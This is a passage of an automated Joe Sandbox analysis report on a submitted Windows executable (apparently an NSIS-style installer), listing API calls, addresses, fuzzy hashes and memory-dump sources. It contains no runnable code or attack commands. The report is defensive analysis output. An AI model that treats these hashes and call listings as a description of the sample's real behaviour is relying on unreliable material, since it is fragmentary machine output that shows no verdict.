                                                                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                    • String ID: N
                                                                                                                                    • API String ID: 3103080414-1130791706
                                                                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
• Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
• Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
• Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
• GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
  • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
  • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
• GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
• wsprintfA.USER32 ref: 0040621C
• GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
• SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
• GlobalFree.KERNEL32(00000000), ref: 00406305
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
  • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
  • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
• Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
• Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
• Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 0040455A
• GetSysColor.USER32(00000000), ref: 00404598
• SetTextColor.GDI32(?,00000000), ref: 004045A4
• SetBkMode.GDI32(?,?), ref: 004045B0
• GetSysColor.USER32(?), ref: 004045C3
• SetBkColor.GDI32(?,?), ref: 004045D3
• DeleteObject.GDI32(?), ref: 004045ED
• CreateBrushIndirect.GDI32(?), ref: 004045F7
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
• Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
  • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
• Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
• Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
• Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                    • lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                    • lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                    • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
• Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
• Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
• Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
• CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
• CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-4010320282
• Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
• Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
• Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
• Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
• GetMessagePos.USER32 ref: 00404EB4
• ScreenToClient.USER32(?,?), ref: 00404ECE
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
• Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
• Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
• MulDiv.KERNEL32(0005B0AC,00000064,0005B0B0), ref: 00402FE1
• wsprintfW.USER32 ref: 00402FF1
• SetWindowTextW.USER32(?,?), ref: 00403001
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
Strings
• verifying installer: %d%%, xrefs: 00402FEB
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
• Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
• Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
• Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
• GlobalFree.KERNEL32(?), ref: 00402A0B
• GlobalFree.KERNEL32(00000000), ref: 00402A1E
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
• Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
• Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
• Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
• Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
• Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,?), ref: 00401D9F
• GetClientRect.USER32(?,?), ref: 00401DEA
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
• DeleteObject.GDI32(00000000), ref: 00401E3E
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                    • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                    • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                    • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                    • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                    • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                    • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                    • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                    • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                    • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                    • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
